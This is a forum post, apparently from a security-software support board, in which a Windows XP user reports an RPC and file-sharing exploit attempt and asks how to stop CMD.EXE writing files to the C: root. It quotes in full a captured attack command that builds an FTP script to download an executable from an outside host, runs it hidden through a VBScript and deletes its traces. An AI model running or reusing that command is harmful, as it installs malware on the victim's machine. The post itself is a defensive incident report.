once I installed CIS (ver 3.8.65951.477) and disabled Windows firewall, it suddenly happened, soon after I was connected to Internet via a provider that assign public IP (it doesn’t happens with other NATted provider), that I received an alert from F+ about an Incoming connection to “System”.
Well, later I found that it was a “always running” exploit attempt that target RPC service and File&Printer sharing service.
Even if WinXP SP2 RPC should be immune from this kind of exploit, once I allowed the incoming connection request the exploit went ahead and a new CMD.EXE process were created as wmiprvse.exe child.
Well… the CMD.EXE task were fired with these arguments:
cmd /c echo open f1tp.3322.org>c:\gz&& echo f1t>>c:\gz&& echo f1t>>c:\gz&& echo binary>>c:\gz&& echo get b.exe c:\aa.exe>>c:\gz&& echo bye>>c:\gz&& echo del c:\run.vbs>c:\a.bat&& echo del c:\a.bat>>c:\a.bat&& echo ftp -s:c:\gz>c:\ff.bat&& echo c:\aa.exe>>c:\ff.bat&& echo del c:\gz>>c:\ff.bat&& echo cmd /c c:\a.bat>>c:\ff.bat&& echo del c:\ff.bat>>c:\ff.bat&& echo CreateObject(“WScript.Shell”).Run “cmd /c c:\ff.bat”,0 >c:\run.vbs&& c:\run.vbs
If it’s not clear, that way CMD.EXE create four files (gz, a.bat, ff.bat, run.vbs), and then run the VBScript file (run.vbs).
That script launch, as hided, the batch file, that start the ftp task which execute the ftp commands listed on file “gz” to download the executable file aa.exe; once the maleware is downloaded it is then started.
Of course, thanks to CIS, I was able to follow all the steps and stop the process before the VBscript file was executed… then I downloaded the malware by myself and sent it to VirusTotal for a check.
That said this is the main question:
How do I prevent CMD.EXE to create/modify files on the root folder of C: partition?
I went to “Computer Security Policy” and then edited CMD.EXE “Protected File/Folders” Access Rights and addedd “C:*” to the “Blocked Files/Folders”…however it doesn’t seems to work.
I made a test batch file that create a C:\Temp.txt file and then run FTP; and even in Paranoid mode, D+ intercept the attempt to run the ftp executable but doesn’t intercept nor it prevents CMD.EXE from create the C:\Temp.txt file.
I was able to get something similar to what I want by creating a new “System partition root” group inside “My Protected Files”, that point to “C:*”.
This way, while in “paranoid mode”, D+ intercept the CMD.EXE file creation attempt, but it intercept also the modifications attempt to any files on C: of all the running task that doesn’t have “allow” on “Protected File/Folders” Access Rights.
Is there a way to protect just the main level folder excluding the sub-folders?
Is there a way to intercept file creation/modification attempt from just CMD.EXE?
Any help/advice will be greately appreciated
[attachment deleted by admin]